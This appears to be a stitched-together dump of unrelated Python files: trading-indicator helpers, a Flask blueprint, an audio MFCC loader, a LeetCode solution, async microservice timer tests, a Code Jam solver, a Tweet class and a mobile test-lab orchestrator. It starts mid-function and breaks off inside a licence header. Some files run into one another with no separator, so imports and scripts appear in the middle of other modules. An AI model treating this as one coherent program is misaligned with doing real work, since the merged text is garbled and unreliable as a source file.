        if retracement > result_show.max_retracement:
            result_show.max_retracement = retracement
    # update std and trade success times
    result_show.std = compute_std(net_value)
    result_show.trade_succeed = trade_succeed
    result_show.trade_times = trade_times
    print("easy net value compute has completed.")
    return net_value
def compute_index_net(data, result_show):
    """Index (buy-and-hold) net value series: data[i] / data[0].

    Also records the maximum drawdown of that series on
    result_show.easy_max_retracement.
    """
    print("compute index net value...")
    result_show.easy_max_retracement = 0
    peak = 0
    series = [1] * len(data)
    for i, value in enumerate(data):
        series[i] = value / data[0]
        # track the running peak, then the drawdown from it
        if series[i] > peak:
            peak = series[i]
        drawdown = (peak - series[i]) / peak
        if drawdown > result_show.easy_max_retracement:
            result_show.easy_max_retracement = drawdown
    print("index net value compute has completed.")
    return series
def profit_per(data_close):
    """Per-bar percentage return: 100 * (close[i] / close[i-1] - 1).

    The first entry is 0 (no previous close to compare against).
    """
    rates = [0] * len(data_close)
    rates[0] = 0
    for i in range(1, len(data_close)):
        rates[i] = (data_close[i] / data_close[i - 1] - 1) * 100
    return rates
def profit_per_incycle(data_close, data_open):
    """Intrabar percentage return: 100 * (close[i] / open[i] - 1)."""
    rates = [0] * len(data_close)
    for i in range(len(data_close)):
        rates[i] = (data_close[i] / data_open[i] - 1) * 100
    return rates
def open_jump(data_close, data_open):
    """Overnight gap in percent: 100 * (open[i] / close[i-1] - 1).

    The first entry is 0 (no previous close).
    """
    gaps = [0] * len(data_close)
    gaps[0] = 0
    for i in range(1, len(data_close)):
        gaps[i] = (data_open[i] / data_close[i - 1] - 1) * 100
    return gaps
def set_xlable_visible(data):
    """Show only ~3 evenly spaced x tick labels on the current axes.

    The last data label is always shown and all labels are reset to
    rotation 0.  (Function name typo is kept for caller compatibility.)

    Fix: for len(data) < 3 the stride became 0 and the modulo below raised
    ZeroDivisionError; the stride is now clamped to at least 1.
    """
    ax = plt.gca()
    visible_count = max(1, int(len(data) / 3))
    for ind, label in enumerate(ax.xaxis.get_ticklabels()):
        # keep every visible_count-th label, hide the rest
        label.set_visible(ind % visible_count == 0)
        # always keep the label that corresponds to the last data point
        # (equivalent to the original ind / (len(data) - 1) == 1 check,
        # without dividing by zero for single-point data)
        if len(data) > 1 and ind == len(data) - 1:
            label.set_visible(True)
    ax = plt.gca()
    for label in ax.xaxis.get_ticklabels():
        label.set_rotation(0)
def date_format(data):
    """Truncate each entry (in place) to its first 10 chars: 'YYYY-MM-DD'.

    Entries are stringified first, so datetimes are accepted too.
    Returns the same (mutated) list.
    """
    for i, value in enumerate(data):
        data[i] = str(value)[:10]
    return data
def draw_plot(ai_settings, net_value, target_net_value, data_date):
    """Show the strategy net value above the benchmark index net value."""
    print("waiting for plot drawing...")
    plt.figure(dpi=128, figsize=(12, 6))
    # Upper panel: strategy equity curve.
    plt.subplot(211)
    plt.title("Stategy net value", fontsize=12)
    plt.plot(net_value, color='Red')
    # Lower panel: benchmark index with dates along the x axis.
    plt.subplot(212)
    plt.title(ai_settings.fetch_table + " index net value", fontsize=12)
    x_positions = range(len(data_date))
    plt.plot(x_positions, target_net_value)
    plt.xticks(x_positions, data_date, rotation=0)
    # thin out the x labels so they stay readable
    set_xlable_visible(target_net_value)
    plt.show()
def compute_std(data):
    """Population standard deviation of *data*."""
    size = len(data)
    mean = sum(data) / size
    variance = sum((x - mean) ** 2 for x in data) / size
    return variance ** (1 / 2)
def compute_ema(data, cycle):
    """Exponential moving average with smoothing factor 2 / (cycle + 1).

    ema[0] and ema[1] are seeded directly from the data.
    """
    ema = [data[0]] * len(data)
    ema[1] = data[1]
    for i in range(2, len(data)):
        ema[i] = (2 * data[i] + (cycle - 1) * ema[i - 1]) / (cycle + 1)
    return ema
def compute_macd(data, short, long, mid):
    """MACD histogram: 2 * (DIF - DEA), DIF = EMA(short) - EMA(long)."""
    fast = compute_ema(data, short)
    slow = compute_ema(data, long)
    dif = [f - s for f, s in zip(fast, slow)]
    dea = compute_ema(dif, mid)
    return [(d - e) * 2 for d, e in zip(dif, dea)]
def compute_sma(data, n, m):
    """Chinese-style SMA: sma[i] = (data[i]*m + sma[i-1]*(n-m)) / n.

    Seeded with data[0].
    """
    result = [data[0]]
    for value in data[1:]:
        result.append((value * m + (n - m) * result[-1]) / n)
    return result
def compute_rsi(data, cycle):
    """RSI oscillator: SMA of gains over SMA of absolute moves, times 100.

    Index 0 is seeded with 1 for both series (matching the original
    implementation), so rsi[0] is always 100.
    """
    gains = [1]
    moves = [1]
    for i in range(1, len(data)):
        delta = data[i] - data[i - 1]
        gains.append(delta)
        moves.append(abs(delta))
    # keep only upward moves for the numerator
    ups = [g if g >= 0 else 0 for g in gains]
    avg_up = compute_sma(ups, cycle, 1)
    avg_all = compute_sma(moves, cycle, 1)
    return [a / b * 100 for a, b in zip(avg_up, avg_all)]
def direction_mix(direction, direction_mix):
    """Combine two direction series element-wise.

    Both 1 -> 1; both -1 -> -1; one side 'follow' -> take the other;
    anything else -> 0 (flat).
    """
    combined = [0] * len(direction)
    for i in range(len(direction)):
        d, m = direction[i], direction_mix[i]
        if d == 1 and m == 1:
            combined[i] = 1
        elif d == -1 and m == -1:
            combined[i] = -1
        elif m == 'follow':
            combined[i] = d
        elif d == 'follow':
            combined[i] = m
        else:
            combined[i] = 0
    return combined
def direction_inverse(direction):
    """Flip long/short signals: 1 -> -1, -1 -> 1, anything else -> 0."""
    inverted = [0] * len(direction)
    for i, d in enumerate(direction):
        if d == 1:
            inverted[i] = -1
        elif d == -1:
            inverted[i] = 1
    return inverted
def direction_final(direction, direction_mix, data_date, ai_settings):
    """Merge two signal series into one tradable direction series.

    Both agree (1/-1) -> that value; one side 'follow' -> use the other;
    both 'follow' -> flat.  For intraday tables (fetch_table not ending in
    '1d'), positions are forced flat at the 15:00:00 / 15:15:00 session
    close unless ai_settings.through_night allows holding overnight.

    Fix: the original sliced data_date[i][-8:-1] and fetch_table[-2:-1],
    which drop the final character, so the comparisons against '15:00:00',
    '15:15:00' and '1d' could never match.
    """
    direction_final = [0] * len(direction)
    for i in range(len(direction)):
        if direction[i] == 1 and direction_mix[i] == 1:
            direction_final[i] = 1
        elif direction[i] == -1 and direction_mix[i] == -1:
            direction_final[i] = -1
        elif direction_mix[i] == 'follow' and direction[i] != 'follow':
            direction_final[i] = direction[i]
        elif direction[i] == 'follow' and direction_mix[i] != 'follow':
            direction_final[i] = direction_mix[i]
        elif direction[i] == 'follow' and direction_mix[i] == 'follow':
            direction_final[i] = 0
        elif data_date[i][-8:] == '15:00:00' and \
                ai_settings.through_night == False and \
                ai_settings.fetch_table[-2:] != '1d':
            # NOTE(review): at i == 0 this writes direction_final[-1]
            # (the last element) — behavior preserved from the original.
            direction_final[i - 1] = 0
            direction_final[i] = 0
        elif data_date[i][-8:] == '15:15:00' and \
                ai_settings.through_night == False and \
                ai_settings.fetch_table[-2:] != '1d':
            direction_final[i - 1] = 0
            direction_final[i] = 0
        else:
            direction_final[i] = 0
    return direction_final
def to_date(data):
    """Convert each datetime in *data* to its date component."""
    return [datetime.datetime.date(item) for item in data]
def random_int(a, b, times):
    """Draw *times* random integers in [a, b] inclusive, printing each."""
    draws = [0] * times
    for i in range(times):
        draws[i] = rd.randint(a, b)
        print(draws[i])
    return draws
def m1_m2_direction(out):
    """Direction series from the slope of the 'm1-m2' column.

    Rising over the previous two bars -> 1, falling -> -1, flat -> carry
    the prior direction.  The first two entries are always 0.
    """
    direction = [0] * len(out)
    for i in range(2, len(out)):
        prev = out.loc[i - 1, 'm1-m2']
        prev2 = out.loc[i - 2, 'm1-m2']
        if prev > prev2:
            direction[i] = 1
        elif prev < prev2:
            direction[i] = -1
        else:
            direction[i] = direction[i - 1]
    return direction
def compute_roll(profit_ln, roll):
    """Shift the series for a rolling window: the first *roll* entries are
    0, and entry i (i >= roll) takes the value from position i - 1."""
    shifted = [0] * len(profit_ln)
    for i in range(roll, len(profit_ln)):
        shifted[i] = profit_ln[i - 1]
    return shifted
def if_main(net_value):
    """Return *net_value* only when this module runs as a script.

    When imported, __name__ is the module name, so None is returned.
    """
    if __name__ == '__main__':
        return net_value
    return None
from flask import Blueprint, render_template
from client.database import api
# Blueprint grouping the user-account views; templates/static directories
# are resolved relative to this package.
userpage = Blueprint('userpage', __name__, template_folder='templates',
                     static_folder='static')
# Template rendered by display_userpage.
userpage_url = 'account.html'
@userpage.route('/account', methods=['GET', 'POST'])
def display_userpage():
    """Render the account page with the bookings for user id 0.

    Falls back to a placeholder message when the user has no bookings.
    """
    bookings = api.get_user_details(000)
    if bookings is None:
        bookings = ["You have no bookings"]
    return render_template(userpage_url, myBookings=bookings)
@userpage.route('/details', methods=['GET', 'POST'])
def display_details():
    """Render the static booking-details page."""
    return render_template('details.html')
|
import os
import librosa
import numpy as np
def load_data():
    """Load MFCC feature vectors for each emotion folder under 'data/'.

    For every audio file, the first 1000 flattened MFCC values are kept.
    Returns four lists of feature vectors: (angry, fear, happy, sad).
    """
    features = {'angry': [], 'fear': [], 'happy': [], 'sad': []}
    # The first level of os.walk('data') yields the emotion sub-directories.
    emotion_dirs = next(os.walk('data'))[1]
    for emotion in emotion_dirs:
        folder = os.path.join('data', emotion)
        for root, dirs, files in os.walk(folder):
            for fname in files:
                x, sr = librosa.load(os.path.join(folder, fname))
                # librosa >= 0.10 removed the positional audio argument;
                # it must be passed as the keyword 'y'.
                mfccs = librosa.feature.mfcc(y=x, sr=sr)
                # Only the four known emotion folders contribute features.
                if emotion in features:
                    features[emotion].append(list(np.ndarray.flatten(mfccs))[:1000])
    return features['angry'], features['fear'], features['happy'], features['sad']
|
# https://leetcode.com/problems/flatten-binary-tree-to-linked-list/
# Given a binary tree, flatten it to a linked list in-place.
# For example, given the following tree:
# 1
# / \
# 2 5
# / \ \
# 3 4 6
# The flattened tree should look like:
# 1
# \
# 2
# \
# 3
# \
# 4
# \
# 5
# \
# 6
# Recursive
def flatten(root):  # modify root in-place
    """Flatten a binary tree into a right-leaning list in pre-order."""
    def _fold(node):
        if node is None:
            return
        left, right = node.left, node.right
        # Move the left subtree into the right slot, clearing the left.
        node.left, node.right = None, left
        _fold(left)
        # Walk to the tail of the flattened left chain, then append the
        # saved right subtree and flatten it too.
        tail = node
        while tail.right:
            tail = tail.right
        tail.right = right
        _fold(right)
    _fold(root)
# Iterative DFS
def flatten(root):
    """Iterative pre-order DFS flatten; rewires nodes as they are visited."""
    pending = [root]
    prev = None
    while pending:
        current = pending.pop()
        if not current:
            continue
        # Push right before left so the left child is processed next.
        pending.extend([current.right, current.left])
        # Hang the current node off the previously visited one.
        if prev:
            prev.left = None
            prev.right = current
        prev = current
|
import asyncio
import time
import pytest
from tamarco.core.microservice import MicroserviceContext, task, task_timer
@pytest.fixture
def yaml_settings_ms_ctx(request, event_loop, inject_in_env_settings_file_path):
    """Yield a started MicroserviceContext backed by the injected settings file.

    The context is stopped again once the test using the fixture finishes.
    """
    ms_ctx = MicroserviceContext()
    event_loop.run_until_complete(ms_ctx.start())
    yield ms_ctx
    event_loop.run_until_complete(ms_ctx.stop())
@pytest.mark.asyncio
async def test_deploy_name_loads_from_settings():
    """deploy_name should be populated from settings once the context starts.

    Fixes: the original asserted on 'yaml_settings_ms_ctx' — the fixture
    *function object*, which is always truthy and has no deploy_name
    attribute — instead of the context created here, and was missing the
    @pytest.mark.asyncio marker required to run an async test.
    """
    ms_ctx = MicroserviceContext()
    await ms_ctx.start()
    assert ms_ctx.deploy_name
    assert ms_ctx.deploy_name == "test_tamarco"
    await ms_ctx.stop()
class MicroserviceTestTaskContext(MicroserviceContext):
    """Base microservice context for the task tests below.

    Provides a pass flag and a list of execution timestamps that the task
    coroutines of the subclasses append to.
    """
    # NOTE(review): name-mangled class-level list; not referenced by any
    # code visible here — presumably leftover.
    __init_time_stamp_exec = []
    def __init__(self):
        super().__init__()
        # Per-instance execution timestamps and completion flag.
        self.time_stamp_exec = []
        self.check_pass = False
        self.settings.update_internal(
            {"system": {"deploy_name": "test", "logging": {"profile": "DEVELOP", "stdout": True}}}
        )
class TaskCheckedDecorator(MicroserviceTestTaskContext):
    """Context exposing a single plain @task coroutine.

    Used to verify that a decorated task runs once when the context starts.
    """

    name = "TaskCheckedTaskDecorator"

    @task
    async def check_decorator(self):
        """Record one execution timestamp and flip the pass flag."""
        self.time_stamp_exec.append(time.time())
        self.check_pass = True
class TaskTimerPeriodic(MicroserviceTestTaskContext):
    """Context with a periodic timer task (500 ms, no immediate start)."""

    name = "TaskTimerPeriodic"

    @task_timer(interval=500, one_shot=False, autostart=False)
    async def task_timer_periodic(self):
        """Record one execution timestamp and flip the pass flag."""
        self.time_stamp_exec.append(time.time())
        self.check_pass = True
class TaskExcecuteBeforePeriodicTime(MicroserviceTestTaskContext):
    """Context with a periodic timer task that also fires immediately
    (autostart=True) before its 500 ms interval elapses."""

    name = "TaskExcecuteBeforePeriodicTime"

    @task_timer(interval=500, one_shot=False, autostart=True)
    async def task_exec_before_periodic_time(self):
        """Record one execution timestamp and flip the pass flag."""
        self.time_stamp_exec.append(time.time())
        self.check_pass = True
class TaskOneShot(MicroserviceTestTaskContext):
    """Context whose timer task fires exactly once after its interval."""

    # Fixed copy-paste: this previously reused the name
    # "TaskExcecuteBeforePeriodicTime" from the class above.
    name = "TaskOneShot"

    @task_timer(interval=500, one_shot=True, autostart=False)
    async def task_task_one_shot(self):
        """Record the single execution and flip the pass flag."""
        self.check_pass = True
        self.time_stamp_exec.append(time.time())
class TaskMultipleTaskAndTimerTask(MicroserviceTestTaskContext):
    """
    Class check multiple task:
        * Task
        * Periodic Task
        * Periodic One Shot
        * Periodic Task periodic before execute
    """
    name = "TaskMultipleTaskAndTimerTask"
    # NOTE(review): these are class attributes, so the mutable lists are
    # shared by every instance of this class — fine while the tests create
    # a single instance, but worth confirming.
    check_pass_one_shot = False
    time_stamp_exec_one_shot = []
    check_pass_task = False
    time_stamp_exec_task = []
    check_pass_task_periodic = False
    time_stamp_exec_task_periodic = []
    check_pass_task_execute_before_periodic = False
    time_stamp_exec_task_execute_before_periodic = []
    exception_task_times = 0
    # Task is executed after a time (1500 miliseconds)
    @task_timer(interval=1500, one_shot=True, autostart=False)
    async def task_multiple_task_one_shot(self):
        self.check_pass_one_shot = True
        self.time_stamp_exec_one_shot.append(time.time())
    # Task is executed immediately and after a period (1000 miliseconds)
    @task_timer(interval=1000, one_shot=False, autostart=True)
    async def task_multiple_task_executer_before_periodic(self):
        self.check_pass_task_execute_before_periodic = True
        self.time_stamp_exec_task_execute_before_periodic.append(time.time())
    # Task is executed according to a period (500 miliseconds)
    @task_timer(interval=500, one_shot=False, autostart=False)
    async def task_multiple_task_periodic(self):
        self.check_pass_task_periodic = True
        self.time_stamp_exec_task_periodic.append(time.time())
    # Task raises an exception and is stopped
    @task_timer(interval=1000)
    async def task_with_exception(self):
        self.exception_task_times += 1
        raise Exception
    # Normal Task: runs once at context start
    @task
    async def task_checked_decorated(self):
        self.check_pass_task = True
        self.time_stamp_exec_task.append(time.time())
@pytest.mark.asyncio
async def test_task_checked_decorator(event_loop):
    """A plain @task coroutine runs exactly once after the context starts."""
    ms = TaskCheckedDecorator()
    ms.loop = event_loop
    await ms.start()
    await asyncio.sleep(1)
    assert ms.check_pass, "Not executed task correctly"
    assert len(ms.time_stamp_exec) == 1, "Not executed once"
    await ms.stop()
@pytest.mark.asyncio
async def test_task_timer_periodic(event_loop):
    """A periodic timer task first fires only after its 500 ms interval."""
    ms = TaskTimerPeriodic()
    ms.loop = event_loop
    started_at = time.time()
    await ms.start()
    await asyncio.sleep(1)
    assert ms.check_pass, "Not executed correctly timer periodic"
    assert len(ms.time_stamp_exec) >= 1, "Not executed 1 times. Once periodic interval"
    first_delay = ms.time_stamp_exec[0] - started_at
    assert (
        first_delay >= 0.5
    ), "Not executed correctly because time periodic is less than interval period time"
    await ms.stop()
@pytest.mark.asyncio
async def test_task_timer_periodic_excecute_before_sleep(event_loop):
    """An autostarted timer task fires immediately and then periodically."""
    ms = TaskExcecuteBeforePeriodicTime()
    ms.loop = event_loop
    started_at = time.time()
    await ms.start()
    await asyncio.sleep(1)
    assert ms.check_pass, "Not executed correctly timer periodic"
    assert (
        len(ms.time_stamp_exec) >= 2
    ), "Not executed 2 times. The start time and a periodic interval"
    # The first run happens right after start, before the interval passes.
    assert (
        ms.time_stamp_exec[0] - started_at < 1
    ), "Not executed correctly because time execute is greater than interval "
    # The second run lands inside a sane window around the interval.
    second_delay = ms.time_stamp_exec[1] - started_at
    assert (
        not second_delay < 0.5 and not second_delay > 3
    ), "Not executed correctly because time periodic "
    await ms.stop()
@pytest.mark.asyncio
async def test_task_timer_oneshot(event_loop):
    """A one-shot timer task runs exactly once, after its interval."""
    ms = TaskOneShot()
    ms.loop = event_loop
    started_at = time.time()
    await ms.start()
    await asyncio.sleep(1)
    assert ms.check_pass, "Not executed timer correctly"
    assert len(ms.time_stamp_exec) == 1, "Not executed 1 times"
    assert ms.time_stamp_exec[0] - started_at >= 0.5, "Not executed in time correctly"
    await ms.stop()
@pytest.mark.asyncio
async def test_multiple_task(event_loop):
    """All task flavours coexist: plain, periodic, autostarted, one-shot,
    and a raising task that is stopped after its first execution.

    Fix: the exception-count check was 'assert x, 1' — the 1 was the
    assert *message*, so any non-zero count passed; it now asserts == 1.
    """
    test_microservice_multiple_task = TaskMultipleTaskAndTimerTask()
    test_microservice_multiple_task.loop = event_loop
    time_start = time.time()
    await test_microservice_multiple_task.start()
    await asyncio.sleep(4)
    # The raising task must have run exactly once before being stopped.
    assert test_microservice_multiple_task.exception_task_times == 1
    # Checked Task decorator
    assert test_microservice_multiple_task.check_pass_task, "Not executed task checked decorated"
    assert len(test_microservice_multiple_task.time_stamp_exec_task) == 1, "Not executed task checked decorated once"
    assert (
        test_microservice_multiple_task.time_stamp_exec_task[0] - time_start < 1
    ), "Not executed task checked decorated once the first"
    # Checked Task Periodic
    assert test_microservice_multiple_task.check_pass_task_periodic, "Not executed task periodic"
    assert len(test_microservice_multiple_task.time_stamp_exec_task_periodic) > 1, "Not executed task once"
    assert (
        test_microservice_multiple_task.time_stamp_exec_task_periodic[0] - time_start >= 0.5
    ), "Not executed the first"
    for i in range(1, len(test_microservice_multiple_task.time_stamp_exec_task_periodic)):
        diff_time = (
            test_microservice_multiple_task.time_stamp_exec_task_periodic[i]
            - test_microservice_multiple_task.time_stamp_exec_task_periodic[i - 1]
        )
        assert diff_time > 0.45 and diff_time < 0.65, "No correctly periocity"
    # Checked Task execute before Periodic
    assert (
        test_microservice_multiple_task.check_pass_task_execute_before_periodic
    ), "Not executed task execute before periodic"
    assert (
        len(test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic) > 1
    ), "Not executed task once"
    assert (
        test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic[0] - time_start < 1
    ), "Not executed the first"
    for i in range(1, len(test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic)):
        diff_time = (
            test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic[i]
            - test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic[i - 1]
        )
        assert diff_time > 0.95 and diff_time < 1.5, "No correctly periocity"
    # Check Task One Shot
    assert test_microservice_multiple_task.check_pass_one_shot, "Not executed task oneshot"
    assert len(test_microservice_multiple_task.time_stamp_exec_one_shot) == 1, "Not executed task once"
    assert test_microservice_multiple_task.time_stamp_exec_one_shot[0] - time_start >= 1.45, "Not executed the first"
|
from math import sqrt
def get_answer(length, level):
    """Recursively enumerate digit vectors and write out 'jamcoin'-style hits.

    Relies on module-level globals: num (digit vector), base_check,
    base_num (smallest divisor per base), num_of_answer (remaining answers
    to emit) and output_f (open output file).
    """
    if(length-2 == level):
        global num_of_answer
        if(num_of_answer > 0):
            # Reset per-candidate bookkeeping.
            for i in range(len(base_check)):
                base_check[i] = False
            # The candidate qualifies only if its interpretation in every
            # base 2..10 is composite; bail out on the first prime.
            for base in range(2,11):
                base_check[base-2] = check_prime(get_num(num,base),base)
                if (base_check[base-2] == False): break
            div_num = 0
            for each in base_check:
                if(each == True):
                    div_num+=1
            # All nine bases composite -> emit the value and its divisors.
            if(div_num==9):
                output_f.write("%d "%get_num(num,10))
                for i in range(8):
                    output_f.write("%d "%base_num[i])
                output_f.write("%d\n"%base_num[8])
                num_of_answer -= 1
    else:
        # Try both 0 and 1 for the next interior digit.
        for i in range(2):
            num[level+1] = i
            get_answer(length,level+1)
def check_prime(num, base):
    """Return True when *num* is composite (despite the name, True means
    NOT prime).

    Side effect: stores the smallest divisor found in the module-level
    base_num[base - 2].
    """
    for candidate in range(2, int(sqrt(num)) + 1):
        if num % candidate == 0:
            base_num[base - 2] = candidate
            return True
    return False
def get_num(array, base):
    """Interpret *array* as digits (most-significant first) in *base*.

    Uses Horner's scheme, equivalent to summing digit * base**position.
    """
    value = 0
    for digit in array:
        value = value * base + digit
    return value
# ---- Script driver: read the problem input, emit answers to output.txt ----
input_f = open("input.in", "r")
output_f = open("output.txt", "w")
input_f.readline()  # skip the test-case count line
output_f.write("Case #1:\n")
(str_length, str_num_of_answer) = input_f.readline().replace("\n","").split(" ")
length = int(str_length)
num_of_answer = int(str_num_of_answer)
# Globals shared with get_answer()/check_prime(): the candidate digit
# vector and per-base composite/divisor bookkeeping (bases 2..10).
num = []
base_check = []
base_num = []
for i in range(length):
    num.append(1)
for i in range(9):
    base_check.append(False)
    base_num.append(0)
get_answer(length,0)
input_f.close()
output_f.close()
import pytest
from PythonTesting.pytestsdemo.BaseClass import BaseClass
@pytest.mark.usefixtures("dataLoad")
class TestExample2(BaseClass):
    """Demonstrates consuming a fixture's returned data inside a test class."""
    # NOTE(review): pytest only collects methods named 'test_*' by default,
    # so this method will not run as a test — presumably it should be
    # renamed to test_editProfile; confirm.
    def editProfile(self,dataLoad):
        log=self.getLogger()
        # The fixture's return value is only accessible here because
        # 'dataLoad' is also declared as a method parameter.
        log.info(dataLoad[0])
|
class Tweet:
    """Container for per-tweet engagement features plus the author's
    account-level statistics."""
    def __init__(self,time,pos_words,neg_words,emojis,emoticons,retweet_count,
                 favorite_count,listed_count,metion_count,follower_count_user,
                 friend_count_user,total_favorite,total_posts):
        ## Each tweet: content and engagement features
        self.time = time
        self.pos_words = pos_words        # positive-word count
        self.neg_words = neg_words        # negative-word count
        self.emojis = emojis
        self.emoticons = emoticons
        self.retweet_count = retweet_count
        self.favorite_count = favorite_count
        self.listed_count = listed_count
        # NOTE(review): parameter 'metion_count' looks like a typo for
        # 'mention_count'; the name is kept for caller compatibility.
        self.mention_count = metion_count
        ## User: account-level statistics of the tweet's author
        self.follower_count_user = follower_count_user
        self.friend_count_user = friend_count_user
        self.total_favorite = total_favorite
        self.total_posts = total_posts
|
import time
from urllib.parse import urlparse, parse_qs
from threading import Thread
from threading import Lock
from .server import HttpServer
from .configuration import Configuration
from .scenario import Scenario
from .clients.android import AndroidClient
from .clients.ios import IosClient
from .clients.osx import OsxClient
from .storage import Storage
from .log import Log
class TestLab(object):
    """Orchestrates test scenarios across a fleet of platform clients.

    Starts a local HTTP server that clients report results to, launches
    every configured scenario on all clients, monitors completion, then
    prints a summary and exits the process (0 on success, 1 on failure).
    """
    def __init__(self, path_or_json):
        # path_or_json: configuration file path or raw JSON for Configuration.
        # The result-server handler reaches back to this instance through
        # the handler's class attribute.
        RequestHandler.TEST_LAB = self
        self.configuration = Configuration(path_or_json)
        self.server = None
        self.server_url = self.configuration.json.get('server_url', 'http://127.0.0.1:8010')
        self.server_url = str(self.server_url)
        # Split an explicit ':port' suffix off the configured URL.
        # NOTE(review): a URL with a scheme but no port ('http://host')
        # would match the scheme colon and fail int() — confirm inputs.
        if ':' in self.server_url:
            index = self.server_url.rfind(':')
            self.server_port = int(self.server_url[index+1:])
            self.server_url = self.server_url[:index]
        else:
            self.server_port = 8000
        self.server_thread = None
        self.monitor_thread = None
        self.start_time_monitor = 0
        self.results_storage = Storage()
        self.scenarios = []
        for scenario in self.configuration.json['scenarios']:
            self.scenarios.append(Scenario(scenario))
        self.clients = []
        self.clients_count = 0
        self._create_clients()
        self._terminate = False
        # Guards results_storage/_terminate against the handler threads.
        self.mutex = Lock()
    def run(self):
        """Run every scenario in sequence, then report results and exit."""
        self._run_server()
        for scenario in self.scenarios:
            self.results_storage.push_test_case(scenario.name)
            self._run_monitor(scenario)
            try:
                self._run_scenario(scenario)
            except RuntimeError as error:
                Log.error(error)
                self._terminate = True
            self.monitor_thread.join()
        self._stop_server()
        self._print_results()
    def _run_server(self):
        """Start the HTTP result server on a background thread."""
        Log.info('Run server')
        def worker():
            self.server.serve_forever()
        self.server = HttpServer.start(url=self.server_url, port=self.server_port,
                                       request_handler_class=RequestHandler)
        self.server_thread = Thread(target=worker)
        self.server_thread.start()
    def _run_monitor(self, scenario):
        """Poll result progress once a second until every client reported,
        the scenario timed out, or termination was requested."""
        Log.info('Run monitor')
        def worker():
            self.start_time_monitor = time.time()
            while time.time() <= self.start_time_monitor + scenario.timeout:
                time.sleep(1)
                with self.mutex:
                    if self._terminate:
                        break
                    current = self.results_storage.get_records_count(scenario.name)
                elapsed = int(time.time() - self.start_time_monitor)
                Log.debug('Progress: {}s {}/{}', elapsed, current, self.clients_count)
                if current >= self.clients_count:
                    break
        self.monitor_thread = Thread(target=worker)
        self.monitor_thread.start()
    def _run_scenario(self, scenario):
        """Launch *scenario* on every client in parallel and wait."""
        def worker(client, scenario_name):
            self.clients_count += client.launch(self.configuration, scenario_name)
        threads = []
        for client in self.clients:
            thread = Thread(target=worker, args=(client, scenario.name))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
    def _stop_server(self):
        """Shut the result server down and join its thread."""
        Log.info('Stop server')
        if self.server:
            self.server.shutdown()
            self.server_thread.join()
            self.server = None
    def _create_clients(self):
        """Instantiate one client per configured platform, in parallel.

        Unknown platform names are silently skipped.
        """
        threads = []
        def create(platform):
            clients = {
                'android': AndroidClient,
                'ios': IosClient,
                'osx': OsxClient,
            }
            if platform not in clients:
                return None
            client = clients[platform](self.configuration)
            client.server_url = 'http://{}:{}'.format(self.server_url, self.server_port)
            self.clients.append(client)
            self.clients_count += len(client.devices)
        for platform in self.configuration.json['clients']:
            thread = Thread(target=create, args=(platform, ))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
    def _print_results(self):
        """Print per-scenario records and exit(0/1) based on overall success.

        Success requires every scenario to have a stored test case, every
        record to have result code 0, and every client to have reported.
        """
        Log.whitespace()
        Log.result('Tests result:')
        success = len(self.results_storage.results) == len(self.scenarios)
        for test_case in self.results_storage.results:
            Log.result(' Test: {}', test_case.name)
            for record in test_case.results:
                Log.result(' Platform: {}, Name: {}, ID: {}, Result code: {}, Duration: {}s', record.client_platform,
                           record.client_name,
                           record.client_id,
                           record.result_code,
                           record.duration)
                success = success and (record.result_code == 0)
            success = success and len(test_case.results) == self.clients_count
        Log.result('Sumary: {}', 'Success' if success else 'Failed')
        # NOTE(review): terminates the whole process; run() never returns.
        exit(0 if success else 1)
    def add_result(self, code, scenario, client_id, client_name, client_platform):
        """Store one client result with the elapsed time since monitoring began."""
        elapsed_seconds = int(time.time() - self.start_time_monitor)
        self.results_storage.add_result(scenario, code, client_id, client_name, client_platform, elapsed_seconds)
class RequestHandler:
    """HTTP handler that records scenario results posted by clients."""

    # Back-reference to the owning TestLab, set by TestLab.__init__.
    TEST_LAB = None

    def __init__(self, server):
        self.response = None
        self.server = server

    def handle(self, _, payload):
        """Parse a result report from *payload* and store it on TEST_LAB.

        Expects '/result?code=..&scenario=..[&id=..&name=..&platform=..]'.
        Replies 'ok' on success and 'error' when a RuntimeError occurs.
        """
        try:
            parsed = urlparse(payload)
            params = parse_qs(parsed.query)
            Log.debug('Got Payload: {}', payload)
            # Fixed operator precedence: the original condition was
            # '(path == "/result" and "code" in params) or "scenario" in params',
            # so any payload carrying a 'scenario' parameter was accepted and
            # then crashed with an uncaught KeyError on the missing 'code'.
            if parsed.path == '/result' and 'code' in params and 'scenario' in params:
                code = int(params['code'][0])
                scenario = params['scenario'][0]
                client_id = params['id'][0] if 'id' in params else 'unknown'
                client_name = params['name'][0] if 'name' in params else 'unknown'
                client_platform = params['platform'][0] if 'platform' in params else 'unknown'
                with RequestHandler.TEST_LAB.mutex:
                    RequestHandler.TEST_LAB.add_result(code, scenario, client_id, client_name, client_platform)
        except RuntimeError:
            self.server.send('error'.encode())
        else:
            self.server.send('ok'.encode())
|
#!/usr/bin/env python2.6
# Copyright (c) 2010, Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# # Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# # Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# # Neither the name of Code Aurora Forum, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
